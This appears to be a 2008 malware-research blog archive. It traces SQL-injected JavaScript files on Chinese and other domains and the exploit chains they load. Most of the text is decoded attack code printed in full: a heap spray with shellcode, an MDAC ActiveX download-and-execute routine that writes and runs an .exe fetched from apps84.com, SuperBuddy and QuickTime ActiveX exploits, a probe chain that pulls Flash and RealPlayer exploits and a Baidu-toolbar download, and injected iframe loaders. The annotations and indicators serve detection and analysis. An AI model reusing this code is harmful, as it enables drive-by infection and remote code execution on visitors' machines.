Archive for June, 2008

www.qq117cc.cn/k.js

Posted in sql injection on June 28, 2008 by s3cu

This injected JS contains iframes pointing to 456.htm and dj.htm, as well as to dvb.bnmfg.com.cn/bnmfg/aa.htm?11

456.htm loads malicious swf files.

dj.htm loads exploits from http://www.heiheinn.cn

The iframe dvb.bnmfg.com.cn/bnmfg/aa.htm?11 downloads a bunch of other exploits targeting realplayer, flashplayer and others

www.westpacsecuresite.com/b.js

Posted in sql injection on June 25, 2008 by s3cu

This SQL-injected URL loads a hidden iframe from http://bios47.com/cgi-bin/index.cgi?ad
bios47.com uses the same obfuscated scripts as apps84.com

www.update34.com/b.js

Posted in sql injection on June 25, 2008 by s3cu

This newly injected domain loads a hidden iframe from http://apps84.com/cgi-bin/index.cgi?ad

index.cgi?ad is an obfuscated JS which, once decoded, will — depending on the browser version and language setting — download code from http://apps84.com/cgi-bin/index.cgi?ffd34c3e0100f0600077e0ed58060000000002b7b2ae43ff%5Bcode]

Interestingly, the code downloaded is another obfuscated JavaScript. Decoding it with the same method yields the following code

// Builds a pseudo-random string of `C9a5yGFZ` characters drawn from the
// alphabet below (lowercase letters without 'j', plus digits).
// l8NTJVdS() uses it to name the dropped executable, so the file name on
// disk is not a stable indicator; the fixed "c:\" prefix and ".exe"
// suffix are.
function q37Qot3M(C9a5yGFZ)
{
	var qPjQyRih = "abcdefghiklmnopqrstuvwxyz0123456789";
	var Z4mYjfqe = '';
	for (var ayDbH97x=0; ayDbH97x<C9a5yGFZ; ayDbH97x++) {
		var UxA8KpPP = Math.floor(Math.random() * qPjQyRih.length);
		Z4mYjfqe += qPjQyRih.substring(UxA8KpPP, UxA8KpPP+1);
	}

	return Z4mYjfqe;
}

// Tries to obtain a COM object with ProgID `zDW_Nrnc` through the host
// object `gqzRhsXa`, evaluating each CreateObject/GetObject call form in
// the list below until one yields a non-null result. Every failure is
// swallowed by the empty catch, so on a hardened browser this simply
// returns null.
// Detection note: script-driven CreateObject/GetObject of XMLHTTP,
// ADODB.Stream and WScript.Shell (see GpU6LOfo) is the hallmark of this
// drive-by chain; eval() here only assembles the call string.
function rRr2voNt(gqzRhsXa, zDW_Nrnc)
{
	var UqeZTIIs = null;
	var ewf9BHSL = 'UqeZTIIs=gqzRhsXa.';
	var pb4SCZne = new Array(
		'CreateObject(zDW_Nrnc)',
		'CreateObject(zDW_Nrnc, "")',
		'CreateObject(zDW_Nrnc, "", "")',
		'GetObject("", zDW_Nrnc)',
		'GetObject(zDW_Nrnc, "")',
		'GetObject(zDW_Nrnc)'
	);

	var ibygzrSi=0;

	// Stop at the first form that leaves UqeZTIIs non-null.
	while(!UqeZTIIs && ibygzrSi < pb4SCZne.length) {
		try {
			eval(ewf9BHSL+pb4SCZne[ibygzrSi]);
		} catch(e) { }

		ibygzrSi++;
	}
	
	return UqeZTIIs;
}

// Issues a synchronous GET for `nmg1Ya8Z` through the XMLHTTP-style
// object `rDx3Y3YK` and returns its binary `responseBody`.
// Returns 0 if open()/send() throws (e.g. the request is blocked).
function EQnpdJ3R(rDx3Y3YK, nmg1Ya8Z)
{

	try {
		rDx3Y3YK.open("GET", nmg1Ya8Z, false);
		rDx3Y3YK.send(null);

	} catch(e) { return 0; }

	return rDx3Y3YK.responseBody;
}


// Writes the binary payload `nlpYQQkD` to the path `GGib1Bbs` through an
// ADODB.Stream-style object `kJVv5iSV`. Type=1, Mode=3 and the
// SaveToFile flag 2 are the standard ADODB.Stream values for a binary
// stream, read/write access and create-or-overwrite (they are not
// defined on this page). Returns 1 on success, 0 if any step throws.
// Host-based detection: a browser process writing an .exe via
// ADODB.Stream.SaveToFile.
function iFzeRt3v(kJVv5iSV, GGib1Bbs, nlpYQQkD)
{

	try {
		kJVv5iSV.Type = 1;
		kJVv5iSV.Mode = 3;
		kJVv5iSV.Open();
		kJVv5iSV.Write(nlpYQQkD);
		kJVv5iSV.SaveToFile(GGib1Bbs, 2);
		kJVv5iSV.Close();
	} catch(e) { return 0; }

	return 1;
}

// Download-and-execute step: fetches `fjt4aEGK` with EQnpdJ3R(), writes
// the bytes to c:\<6 random chars>.exe with iFzeRt3v(), then launches it.
// `GFWQLQNh` selects the launcher object type: 0 means `f8ooKsQo.Run`
// (WScript.Shell), anything else `f8ooKsQo.ShellExecute`
// (Shell.Application); GpU6LOfo() sets this flag to match the object it
// obtained. The trailing 0 arguments request a hidden window.
// Returns 1 only if the launch call did not throw, 0 otherwise.
function l8NTJVdS(fjt4aEGK, rDx3Y3YK, kJVv5iSV, f8ooKsQo, GFWQLQNh)
{
	var ybDUybhC = 0;
	var HgFYBJZD = EQnpdJ3R(rDx3Y3YK, fjt4aEGK);

	if (HgFYBJZD != 0) {
		// Dropped file path: fixed drive root + random name + ".exe".
		var lJ99WYEL = "c:\\"+q37Qot3M(6)+".exe";

		if (iFzeRt3v(kJVv5iSV, lJ99WYEL, HgFYBJZD) == 1) {
			if (GFWQLQNh == 0) {
				try {
					f8ooKsQo.Run(lJ99WYEL, 0);
					ybDUybhC = 1;
				} catch(e) { }
			} else {
				try {
					f8ooKsQo.ShellExecute(lJ99WYEL, "", "", "open", 0);
					ybDUybhC = 1;
				} catch(e) { }
			}
		}
	}

	return ybDUybhC;
}

// Drive-by download driver. Creates an <object> with the CLSID below and
// uses it as the host for rRr2voNt() to obtain three COM objects: an
// XMLHTTP transport, an ADODB.Stream writer and a shell launcher.
// NOTE(review): this CLSID is widely reported as the MDAC RDS.DataSpace
// control abused to instantiate arbitrary COM objects from script; confirm
// against the vendor advisory before citing it.
// When all three objects are available, calls l8NTJVdS() once per URL
// (bc_CUBHX = 1, so only VGCo6zkO + "0"). Returns 1 if any launch
// succeeded, otherwise 0; every exception is swallowed.
// Indicators: the CLSID string, the four ProgIDs and the second-stage URL
// below are the stable values to alert on.
function GpU6LOfo()
{
	var rEoXWlfi = 0;
	var bc_CUBHX = 1;
	var VGCo6zkO = "http://apps84.com/cgi-bin/index.cgi?ff4a457c0100f0600277e0ed58060000000002b72ba2710001040900000000020";
	// [0] = XMLHTTP, [1] = ADODB.Stream, [2] = WScript.Shell or Shell.Application
	var kf4nCFPY = new Array(null, null, null);

	try {
		// 0 = launcher supports Run (WScript.Shell); 1 = ShellExecute (Shell.Application)
		var nAn0J9zC = 0;
		var rv9jQ4yP = document.createElement("object");
		rv9jQ4yP.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");

		if (rv9jQ4yP) {
			kf4nCFPY[0] = rRr2voNt(rv9jQ4yP, "msxml2.XMLHTTP");
			if (!kf4nCFPY[0])
				kf4nCFPY[0] = rRr2voNt(rv9jQ4yP, "Microsoft.XMLHTTP");
			
			if (!kf4nCFPY[0])
				kf4nCFPY[0] = rRr2voNt(rv9jQ4yP, "MSXML2.ServerXMLHTTP");

			kf4nCFPY[1] = rRr2voNt(rv9jQ4yP, "ADODB.Stream");

			kf4nCFPY[2] = rRr2voNt(rv9jQ4yP, "WScript.Shell");

			if (!kf4nCFPY[2]) {
				kf4nCFPY[2] = rRr2voNt(rv9jQ4yP, "Shell.Application");
				if (kf4nCFPY[2]) nAn0J9zC = 1;
			}
		}

		if (kf4nCFPY[0] && kf4nCFPY[1] && kf4nCFPY[2]) {
			for(var ELxcGHTj=0;ELxcGHTj<bc_CUBHX;ELxcGHTj++) {
				var GH3tzsho = l8NTJVdS(VGCo6zkO+ELxcGHTj.toString(), kf4nCFPY[0], kf4nCFPY[1], kf4nCFPY[2], nAn0J9zC);

				// Keep the first successful result.
				if (!rEoXWlfi)
					rEoXWlfi = GH3tzsho;
			}
		}

	} catch(e) {}

	return rEoXWlfi;
}

// Sets the `id` and/or `addt` cookies (path=/) with an expiry 120000 days
// out — presumably a marker that this visitor has already been served an
// exploit (callers pass 9 on the SuperBuddy path and 6 on the QuickTime
// path as `NpTt78SK`; `vyRa5Vhw` is never supplied on this page).
// Any exception is swallowed. A cookie named "id" or "addt" with a
// far-future expiry is a cheap client-side indicator of this kit.
function z15QLzDF(NpTt78SK, vyRa5Vhw)
{
	try {

		var bcUSP1AU = new Date();
		bcUSP1AU.setDate(bcUSP1AU.getDate() + 120000);

		if (NpTt78SK) {
			document.cookie =
				"id=" + NpTt78SK +
				"; path=/" +
				"; expires=" + bcUSP1AU.toGMTString();
		}

		if (vyRa5Vhw) {
			document.cookie =
				"addt=" + vyRa5Vhw +
				"; path=/" +
				"; expires=" + bcUSP1AU.toGMTString();
		}


	} catch(e) {
	}
}

// Global spray buffer filled by S3czSfbD() and kept referenced by t02H59nf().
var lajutPnm = new Array();
// Once-only guard so the spray runs a single time even if both exploit
// paths are attempted.
var xnyWSACx = 0;

// Self-rescheduling timer (every 100 ms). The self-assignment is a no-op
// apart from touching `lajutPnm`; presumably intended to keep the sprayed
// array referenced while the exploit runs — not verifiable from this page.
function t02H59nf()
{
	lajutPnm = lajutPnm;
	setTimeout(t02H59nf, 100);
}

// Repeatedly doubles `qXNjDqmd` until its size in bytes (2 per UTF-16
// code unit) reaches `aDNIjIpy`, then truncates it to exactly
// aDNIjIpy/2 characters. The result is only an exact byte length when
// `aDNIjIpy` is even; the single caller (S3czSfbD) passes an even value.
function wuWdTHTE(qXNjDqmd, aDNIjIpy)
{
	while (qXNjDqmd.length*2<aDNIjIpy)
		qXNjDqmd += qXNjDqmd;

	qXNjDqmd = qXNjDqmd.substring(0,aDNIjIpy/2);
	return qXNjDqmd;
}

// Heap spray, executed at most once (guarded by xnyWSACx). Fills
// lajutPnm with NGNogBza (about 48) strings of 0x400000 bytes each, every
// one consisting of a repeated 0x0c0c0c0c filler built by wuWdTHTE()
// followed by the unescape()d shellcode string below, so that the
// address 0x0c0c0c0c the two ActiveX callers pass in lands inside the
// sprayed region. The 0x38 subtracted from the block size presumably
// accounts for string/heap header overhead — not verifiable here.
// Detection: the "%u0c0c%u0c0c" filler, unescape() of a long %u-encoded
// literal and a loop allocating dozens of multi-megabyte strings are the
// script-level signatures; DEP/ASLR-enabled browsers are the mitigation.
// Always returns 0.
function S3czSfbD()
{
	if (!xnyWSACx) {
		var V2dJq4HP = 0x0c0c0c0c;
		var qsNDyV7P = unescape("%u00e8%u0000%u5d00%uc583%ub914%u018d%u0000%ue4b0%u4530%u4500%u7549%uebf9%u7400%u7474%u7474%u7474%u0d74%ue418%ue4e4%u80bb%ud445%ue4e4%u9ce4%u6fe8%ue8a4%u946f%u49f8%u8c6f%u0fec%u6fed%ud0a4%ua469%u6f98%ud88c%u136f%ue08e%u0cbd%ue46b%ue4e4%u1d06%u8b8c%ue48a%u8ce4%u9691%u8988%u1bb0%u6ff2%u0c0c%ue49d%ue4e4%u336f%u64a3%ue4db%u1e91%ub3a3%u64a3%ue4db%u1e91%u0b6f%ud7bb%u652d%ue008%ue4e5%u6fe4%ub538%ub7b6%ue08c%ue4e5%u1be4%ue8b2%ubdbe%ub6b5%ue66f%ua7b7%udf64%u91e4%u651e%u189f%u81ca%u819c%ue791%u0f67%u6dec%u23e7%ue0a7%u81ca%u819c%ua722%ue4ec%u6ebf%ue025%u6cd4%ue4a1%u24d7%ub4b4%ub3b7%u1bb4%uf4b2%u1c67%u91e4%u8ee2%ub7e5%ub21b%ubee0%u67bd%ue026%u64a5%ue4de%u5091%ub21b%ub5ec%u6fb2%ud891%u906f%u9cca%u11e7%u6fb2%uc492%u11e7%u2dd7%ua5ad%ue749%ud721%ueb3f%uf45a%u32de%uec90%u2f25%ue7e9%ua43e%u150f%ufbdf%u0391%u6fba%uc0ba%u39e7%u6f82%uafe8%uba6f%ue7f8%u6f39%u6fe0%u21e7%uba4f%u27bd%u1b0c%u1b1a%u6a1b%ueaaa%u7c08%u6e1a%u9aea%u063c%ud797%u6e2e%ud2bf%ucbfe%u9494%u8c83%ue4a3%u908c%u9490%ucbde%u85cb%u9494%udc97%ucad0%u8b87%ucb89%u8387%uc98d%u8d86%ucb8a%u8a8d%u8180%uca9c%u8387%udb8d%u8282%u85d0%ud1d0%u87d3%ud5d4%ud4d4%ud482%ud4d2%ud6d4%ud3d3%ud481%u8081%udcd1%ud2d4%ud4d4%ud4d4%ud4d4%ud4d4%ud6d4%ud386%u86d6%ud685%ud5d3%ud4d4%ud5d4%ud0d4%uddd4%ud4d4%ud4d4%ud4d4%ud4d4%udcd4%ue4d4");
		var yuVqerxP = 0x400000;
		var FDatJxfq = qsNDyV7P.length * 2;
		var aDNIjIpy = yuVqerxP - (FDatJxfq+0x38);
		var qXNjDqmd = unescape("%u0c0c%u0c0c");

		qXNjDqmd = wuWdTHTE(qXNjDqmd,aDNIjIpy);
		// Number of blocks needed to reach V2dJq4HP from a 0x400000 base.
		var NGNogBza = (V2dJq4HP - 0x400000)/yuVqerxP;
	
		for (var U4Dn_RUx=0;U4Dn_RUx<NGNogBza;U4Dn_RUx++) {
			lajutPnm[U4Dn_RUx] = qXNjDqmd + qsNDyV7P;
		}

		xnyWSACx = 1;
		t02H59nf();
	}


	return 0;
}

// Exploit path 1: instantiates the 'Sb.SuperBuddy' ActiveX control
// (reported as AOL's SuperBuddy control), runs the heap spray, sets the
// id=9 cookie and calls LinkSBIcons with the sprayed address 0x0c0c0c0c.
// Any exception (control absent or kill-bitted) is swallowed.
// Always returns 0, so the `||` chain at the bottom of the script falls
// through to the next path regardless of outcome.
function JgIeEAxw() {

	try {
		var YNu_L1Ip = new ActiveXObject('Sb.SuperBuddy');

		if (YNu_L1Ip) {
			S3czSfbD();
			z15QLzDF(9);
			YNu_L1Ip.LinkSBIcons(0x0c0c0c0c);
		}
	} catch(e) {
	}

	return 0;
}

// Exploit path 2: instantiates the 'QuickTime.QuickTime.4' ActiveX control,
// runs the heap spray, builds mk84Pufq (803 'A's followed by three
// 0x0c0c0c0c sequences) and injects the markup in Et27CeXt into a new
// <div> appended to the body, then sets the id=6 cookie.
// In the visible code mk84Pufq is built but never used, and Et27CeXt is a
// run of empty strings around a single qtnext1 <param> — presumably the
// <object>/<embed> markup that carried it was stripped when this page was
// extracted, so the snippet as shown is incomplete.
// `gAqc_6tX = 0` assigns an undeclared global; `Zxae7BbE` is re-declared
// with var (harmless, same function scope). Any exception is swallowed.
// Always returns 0.
function zmpCkFBI()
{
	try {
		var plv4KWFi = new ActiveXObject("QuickTime.QuickTime.4");

		if (plv4KWFi) {
			S3czSfbD();
			var mk84Pufq = "";
			for(var Zxae7BbE=0;Zxae7BbE<200;Zxae7BbE++) {
				mk84Pufq += "AAAA";
			}

			mk84Pufq += "AAA";

			for(var Zxae7BbE=0;Zxae7BbE<3;Zxae7BbE++) {
				mk84Pufq += "\x0c\x0c\x0c\x0c";
			}

			// Markup as recovered from the page; the empty strings suggest
			// tags were lost in extraction.
			var Et27CeXt =
				'' +
				'' +
				'' +
				'' +
				'<param name="qtnext1" value="T">' +
				'' +
				'';

			gAqc_6tX = 0;
			var eBUg1ask = document.createElement("div");
			eBUg1ask.innerHTML = Et27CeXt;
			z15QLzDF(6);
			document.body.appendChild(eBUg1ask);

		}
	} catch(e) {
	}

	return 0;
}
// Entry point: tries the MDAC download path first, then the SuperBuddy and
// QuickTime paths. Both branches assign the same value, so
// document.XQYxMigz is always 'about:blank'; the commented-out timer below
// would have navigated the window to it once the paths reported done.
if (GpU6LOfo() || JgIeEAxw() || zmpCkFBI()
) {
	document.XQYxMigz = 'about:blank';
} else {
	document.XQYxMigz = 'about:blank';
}

/*setTimeout(function() {
	if (document.gAqc_6tX && document.mEWDIx_N && document.Z4lSVtbt) {
		setTimeout("window.location = '" + document.XQYxMigz + "';", 1000);
	} else {
		setTimeout(arguments.callee, 1000);
	}
}, 1000);*/

www.j8j8hei.cn/k.js

Posted in sql injection on June 22, 2008 by s3cu

A new SQL injected JS.
It loads iframes from http://www.kiiss117.cn/456.htm and http://www.kiiss117.cn/dj.htm
dj.htm exploits vulnerabilities by loading iframes from http://www.heiheinn.cn/14.htm, real.htm and new.htm

my.stsw5178.cn/1.js

Posted in sql injection on June 12, 2008 by s3cu

Content of this JS

// Injected loader: sets the status-bar text ("完毕" means "finished") and
// writes a 2x2 iframe pointing at the wending09.htm landing page.
window.status = "完毕";
document.write("<iframe src=http://c.liuliang000.com/wending09.htm width=2 height=2></iframe>");

Content of wending09.htm

<!-- wending09.htm: a zero-height iframe to the exploit page main.htm, plus
     a remote script from js.users.51.la (presumably a visitor counter used
     by the operator to track infections). -->
<iframe src=main.htm width=10 height=0></iframe>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1937043.js"></script>

The decoded JS content for main.htm is
// Decoded main.htm: a chain of try/catch/finally probes. Each probe tries to
// instantiate an ActiveX control and, if the caught value is not an Error
// (the author's feature-detection trick: `e!="[object Error]"`), writes the
// matching exploit loader:
//  - ADODB.Stream via the same MDAC CLSID used above (skipped on "msie 7")
//    -> <script src=014.js>
//  - ShockwaveFlash.ShockwaveFlash.9 -> <embed> of <version>.swf from
//    swf.4w4w4w.com, unless the Flash build number is 124 or 60
//  - "\x47\x4c\x49\x45..." decodes to the ProgID GLIEDown.IEDown.1
//    -> hidden iframe lz.htm
//  - IERPCtl.IERPCtl.1 (RealPlayer's IE control) with
//    PRODUCTVERSION <= "6.0.14.552" -> <script src=rl.js>
//  - BaiduBar.Tool, whose "\x44\x6c\x6f\x61\x64\x44\x53" method name
//    decodes to DloadDS, fetching abd.cab and saving it as abd.exe
// Indicators: the ProgIDs, the two hex-escaped strings and the hosts
// swf.4w4w4w.com and xia.9w9w9w.com. The line is left minified as on the page.
try{var e;var ado=(document.createElement("object"));if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var as=ado.createobject("Adodb.Stream","")}catch(e){};finally{if(e!="[object Error]"){var a="%dfdf%%D$F^D%SF&DS";document.write("<script src=014.js><\/script>")}else{try{var f;var Flashver=(new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$version").split(",")}catch(f){};finally{if(f!="[object Error]"&&Flashver[2]!="124"&&Flashver[2]!="60"){document.write('<embed src="http://swf.4w4w4w.com/swf/'+Flashver[2]+'.swf"></embed>')}}try{var g;var glworld=new ActiveXObject("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31")}catch(g){};finally{if(g!="[object Error]"){document.write('<iframe style=display:none src="lz.htm"></iframe>')}}try{var h;var real=new ActiveXObject("IERPCtl.IERPCtl.1")}catch(h){};finally{if(h!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552"){document.write('<sCrIpT LAnGuAgE="jAvAsCrIpT" src=rl.js><\/script>')}}}try{var i;var Baidu=new ActiveXObject("BaiduBar.Tool")}catch(i){};finally{if(i!="[object Error]"){Baidu["\x44\x6c\x6f\x61\x64\x44\x53"]("http://xia.9w9w9w.com/down/abd.cab","abd.exe",0)}}}}
As can be seen some of the exploits are downloaded from

www.fengnima.cn/k.js

Posted in sql injection on June 12, 2008 by s3cu

The content of this JS is similar to the others, basically calling exploits using iframes to

www.killpp.cn/k.js

Posted in sql injection on June 9, 2008 by s3cu

The content of this script loads two iframes:

http://www.qiqicc.cn/dj.htm calls the following iframe

http://www.killpp.cn/456.htm embeds these two Flash files: 4561.swf and 4562.swf

The SWF files download two further SWF files (selected by Flash Player version): WIN%209,0,115,0i.swf and WIN%209,0,115,0f.swf

Virustotal result of WIN%209,0,115,0f.swf

Virustotal result of WIN%209,0,115,0i.swf

www.bannerupd.com/b.js

Posted in sql injection on June 9, 2008 by s3cu

This injected domain loads an iframe from http://err68.com/cgi-bin/index.cgi?ad

new sql injected domains

Posted in sql injection on June 5, 2008 by s3cu

http://www.encode72.com/b.js

// Injected b.js. Runs once per 24 hours per victim: if the "bannerupdate"
// cookie is present nothing happens (empty if-block); otherwise it sets the
// cookie, writes a zero-size, borderless iframe to the err68.com exploit
// URL and pops a window to topsoftwaresale.com as a visible decoy.
// The wrapped lines below ("height\n=0", "director\nies", "top\n=10") are
// artifacts of how the page was extracted, not part of the original
// script; the cookie name and the err68.com URL are the indicators.
window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("bannerupdate=");
if (start != -1)
{}else{
var expires = new Date();
expires.setTime(expires.getTime()+24*1*60*60*1000);
document.cookie = "bannerupdate=update;expires=" + expires.toGMTString();
try{
document.write("<iframe src=http://err68.com/cgi-bin/index.cgi?ad width=0 height
=0 frameborder=0></iframe>");
window.open("http://topsoftwaresale.com",'soft',"toolbar=no,location=no,director
ies=no,status=no,menubar=no,scrollbars=no,resizable=no,width=1015,height=600,top
=10,left=10");
}
catch(e)
{
};
}

As can be seen from the content, it opens the website topsoftwaresale.com, but embedded in the page is an iframe from err68.com/cgi-bin/index.cgi?ad
The content of the iframe, and how to decode it, can be seen here.

Similar to the injected domain above, the others are as follows:
http://www.tag58.com/b.js -> encode72.com/cgi-bin/index.cgi?ad
http://www.win496.com/b.js -> exec51.com/cgi-bin/index.cgi?ad
http://www.exe94.com/b.js -> err68.com/cgi-bin/index.cgi?ad
http://www.view89.com/b.js -> err68.com/cgi-bin/index.cgi?ad
http://www.rundll841.com/b.js -> win496.com/cgi-bin/index.cgi?ad
err68.com/b.js -> win496.com/cgi-bin/index.cgi?ad
exec51.com/b.js -> err68.com/cgi-bin/index.cgi?ad

o7n9.cn/a.js

Posted in sql injection on June 3, 2008 by s3cu

The content of a.js essentially loads an iframe from 456.htm

// Injected a.js, same template as the b.js family above: a 24-hour
// "0wen0wen" cookie makes the payload fire once per victim, after which a
// 10x10 iframe to o7n9.cn/456.htm is written. The `else {` block opened
// below is never closed in this excerpt — the page's copy of the script
// is truncated, so the snippet as shown does not parse on its own.
// Indicators: the cookie name "0wen0wen" and the o7n9.cn URL.
window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("0wen0wen=");
if (start != -1)
{}
else
{
var expires = new Date();
expires.setTime(expires.getTime() +  24 * 1 * 60 * 60 * 1000);
document.cookie = "0wen0wen=funny;expires=" + expires.toGMTString();
try{
document.write("<iframe width=10 height=10 src=http://o7n9.cn/456.htm></iframe>");
}
catch(e)
{
};

The content of 456.htm retrieves two SWF files, 4561.swf and 4562.swf

swfdump -D 4561.swf
[HEADER]        File version: 8
[HEADER]        File is zlib compressed. Ratio: 96%
[HEADER]        File size: 164 (Depacked)
[HEADER]        Frame rate: 12.000000
[HEADER]        Frame count: 1
[HEADER]        Movie width: 550.00
[HEADER]        Movie height: 400.00
[045]         4 FILEATTRIBUTES
[009]         3 SETBACKGROUNDCOLOR (ff/ff/ff)
[018]        31 PROTECT
[00c]        89 DOACTION
(   50 bytes) action: Constantpool(5 entries) String:"fVersion" String:"/:$version" String:"http://o7n9.cn/" String:"i.swf" String:"_root"
(    4 bytes) action: Push Lookup:0 ("fVersion") Lookup:1 ("/:$version")
(    0 bytes) action: GetVariable
(    0 bytes) action: DefineLocal
(    4 bytes) action: Push Lookup:2 ("http://o7n9.cn/") Lookup:0 ("fVersion")
(    0 bytes) action: GetVariable
(    0 bytes) action: Add2
(    2 bytes) action: Push Lookup:3 ("i.swf")
(    0 bytes) action: Add2
(    2 bytes) action: Push Lookup:4 ("_root")
(    0 bytes) action: GetVariable
(    1 bytes) action: GetUrl2 64
(    0 bytes) action: Stop
(    0 bytes) action: End
[001]         0 SHOWFRAME 1 (00:00:00,000)
[000]         0 END

So the two SWF files retrieve the Flash exploits by using the player version as part of the filename.
